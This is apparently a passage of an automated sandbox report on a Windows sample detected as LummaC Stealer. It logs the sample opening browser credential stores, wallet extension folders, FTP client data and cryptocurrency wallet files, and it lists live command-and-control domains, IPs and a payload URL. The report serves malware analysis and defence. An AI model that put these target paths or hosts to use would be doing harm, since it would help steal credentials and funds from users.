      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      12
      Process Injection
      11
      Masquerading
      2
      OS Credential Dumping
      11
      Security Software Discovery
      Remote Services11
      Input Capture
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      121
      Virtualization/Sandbox Evasion
      11
      Input Capture
      3
      Process Discovery
      Remote Desktop Protocol1
      Archive Collected Data
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
      Process Injection
      Security Account Manager121
      Virtualization/Sandbox Evasion
      SMB/Windows Admin Shares31
      Data from Local System
      3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information
      NTDS1
      Application Window Discovery
      Distributed Component Object Model1
      Clipboard Data
      14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA Secrets13
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials15
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580261 Sample: eMBO6wS1b5.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 37 beefshooti.click 2->37 39 tse1.mm.bing.net 2->39 41 5 other IPs or domains 2->41 51 Suricata IDS alerts for network traffic 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 Yara detected LummaC Stealer 2->55 57 3 other signatures 2->57 10 eMBO6wS1b5.exe 21 2->10         started        signatures3 process4 process5 12 cmd.exe 2 10->12         started        file6 31 C:\Users\user\AppData\Local\...\Historic.com, PE32 12->31 dropped 61 Drops PE files with a suspicious file extension 12->61 16 Historic.com 12->16         started        20 cmd.exe 2 12->20         started        22 extrac32.exe 13 12->22         started        24 8 other processes 12->24 signatures7 process8 dnsIp9 33 beefshooti.click 104.21.18.185, 443, 49800, 49804 CLOUDFLARENETUS United States 16->33 35 neqi.shop 172.67.169.205, 443, 49865 CLOUDFLARENETUS United States 16->35 43 Query firmware table information (likely to detect VMs) 16->43 45 Tries to harvest and steal ftp login credentials 16->45 47 Tries to harvest and steal browser information (history, passwords, etc) 16->47 49 Tries to steal Crypto Currency Wallets 16->49 26 powershell.exe 19 16->26         started        signatures10 process11 signatures12 59 Loading BitLocker PowerShell Module 26->59 29 conhost.exe 26->29         started        process13

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      eMBO6wS1b5.exe26%ReversingLabs
      eMBO6wS1b5.exe20%VirustotalBrowse
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\801291\Historic.com0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://aka..oub0%Avira URL Cloudsafe
      https://beefshooti.click/api0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      beefshooti.click
      104.21.18.185
      truetrue
        unknown
        neqi.shop
        172.67.169.205
        truefalse
          high
          ax-0001.ax-msedge.net
          150.171.27.10
          truefalse
            high
            jIjmPxXivVpjpLDcixRH.jIjmPxXivVpjpLDcixRH
            unknown
            unknownfalse
              unknown
              klipcatepiu0.shop
              unknown
              unknownfalse
                high
                tse1.mm.bing.net
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://neqi.shop/sdgjyut/psh.txtfalse
                    high
                    https://beefshooti.click/apitrue
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 0000001C.00000002.2837123581.0000000005AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000001C.00000002.2835357604.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://crl.micropowershell.exe, 0000001C.00000002.2841733957.000000000817F000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001C.00000002.2835357604.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000001C.00000002.2835357604.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://aka..oubpowershell.exe, 0000001C.00000002.2838688444.0000000007104000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://aka.ms/pscore6lBpowershell.exe, 0000001C.00000002.2835357604.0000000004A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001C.00000002.2835357604.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001C.00000002.2835357604.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/powershell.exe, 0000001C.00000002.2837123581.0000000005AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://nuget.org/nuget.exepowershell.exe, 0000001C.00000002.2837123581.0000000005AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Licensepowershell.exe, 0000001C.00000002.2837123581.0000000005AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/Iconpowershell.exe, 0000001C.00000002.2837123581.0000000005AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.autoitscript.com/autoit3/XHistoric.com, 00000011.00000000.2201259639.0000000000635000.00000002.00000001.01000000.00000007.sdmp, Historic.com.3.dr, Everything.14.drfalse
                                              high
                                              http://nsis.sf.net/NSIS_ErrorErroreMBO6wS1b5.exefalse
                                                high
                                                https://www.autoitscript.com/autoit3/Historic.com.3.dr, Everything.14.drfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001C.00000002.2835357604.0000000004A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://go.microspowershell.exe, 0000001C.00000002.2835357604.0000000004E0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://github.com/Pester/Pesterpowershell.exe, 0000001C.00000002.2835357604.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        104.21.18.185
                                                        beefshooti.clickUnited States
                                                        13335CLOUDFLARENETUStrue
                                                        172.67.169.205
                                                        neqi.shopUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1580261
                                                        Start date and time:2024-12-24 08:17:07 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 6m 3s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:32
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:eMBO6wS1b5.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:73565a0bcdcb7ff5f9ce005a2530e215.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@27/26@5/2
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 36
                                                        • Number of non-executed functions: 39
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 2.16.158.83, 2.16.158.80, 2.16.158.91, 2.16.158.75, 2.16.158.90, 2.16.158.96, 2.16.158.82, 2.16.158.169, 2.16.158.170, 2.16.158.176, 2.16.158.187, 2.16.158.35, 2.16.158.40, 2.16.158.186, 2.16.158.179, 2.16.158.27, 2.16.158.184, 2.16.158.33, 2.16.158.74, 2.16.158.56, 2.16.158.72, 2.16.158.51, 2.16.158.43, 23.218.208.109, 20.190.177.23, 20.103.156.88, 13.107.246.63, 172.202.163.200, 150.171.28.10
                                                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, mm-mm.bing.net.trafficmanager.net, login.live.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net
                                                        • Execution Graph export aborted for target powershell.exe, PID 5192 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        TimeTypeDescription
                                                        02:18:03API Interceptor1x Sleep call for process: eMBO6wS1b5.exe modified
                                                        02:18:11API Interceptor10x Sleep call for process: Historic.com modified
                                                        02:19:10API Interceptor19x Sleep call for process: powershell.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        104.21.18.185Setup.exeGet hashmaliciousLummaCBrowse
                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                            https://extrn.offer-21890.com/sign-in?op_token=DRZhttpskostikGet hashmaliciousUnknownBrowse
                                                              172.67.169.205Setup.exeGet hashmaliciousLummaCBrowse
                                                                'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                  AutoUpdate.exeGet hashmaliciousLummaCBrowse
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    ax-0001.ax-msedge.netHUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 150.171.27.10
                                                                    Onboard Training Checklist v1.1 - Wyatt Young (1).xlsxGet hashmaliciousUnknownBrowse
                                                                    • 150.171.28.10
                                                                    https://jkqbjwq.maxiite.comGet hashmaliciousHTMLPhisherBrowse
                                                                    • 150.171.27.10
                                                                    OZq1f2sZz3.exeGet hashmaliciousAsyncRATBrowse
                                                                    • 150.171.27.10
                                                                    Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                    • 150.171.27.10
                                                                    Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                    • 150.171.28.10
                                                                    BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                    • 150.171.28.10
                                                                    613vKYuY2S.exeGet hashmaliciousLummaCBrowse
                                                                    • 150.171.28.10
                                                                    r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 150.171.28.10
                                                                    vRWw6y4Pj2.exeGet hashmaliciousUnknownBrowse
                                                                    • 150.171.27.10
                                                                    beefshooti.clickSetup.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.18.185
                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.18.185
                                                                    neqi.shopSetup.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.169.205
                                                                    'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.169.205
                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.27.229
                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.27.229
                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.27.229
                                                                    AutoUpdate.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.169.205
                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                    • 194.58.112.174
                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                    • 194.58.112.174
                                                                    Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                                                                    • 194.58.112.174
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    CLOUDFLARENETUSqoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.195.241
                                                                    txUcQFc0aJ.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.151.61
                                                                    hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                    • 172.65.251.78
                                                                    nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 8.6.115.225
                                                                    nklmips.elfGet hashmaliciousUnknownBrowse
                                                                    • 104.29.132.180
                                                                    eCompleted_419z.pdfGet hashmaliciousUnknownBrowse
                                                                    • 104.18.95.41
                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.177.88
                                                                    Adobe GenP 5.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.29.252
                                                                    Setup_W.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.44.57
                                                                    iviewers.dllGet hashmaliciousLummaCBrowse
                                                                    • 172.67.195.241
                                                                    CLOUDFLARENETUSqoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.195.241
                                                                    txUcQFc0aJ.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.151.61
                                                                    hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                    • 172.65.251.78
                                                                    nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 8.6.115.225
                                                                    nklmips.elfGet hashmaliciousUnknownBrowse
                                                                    • 104.29.132.180
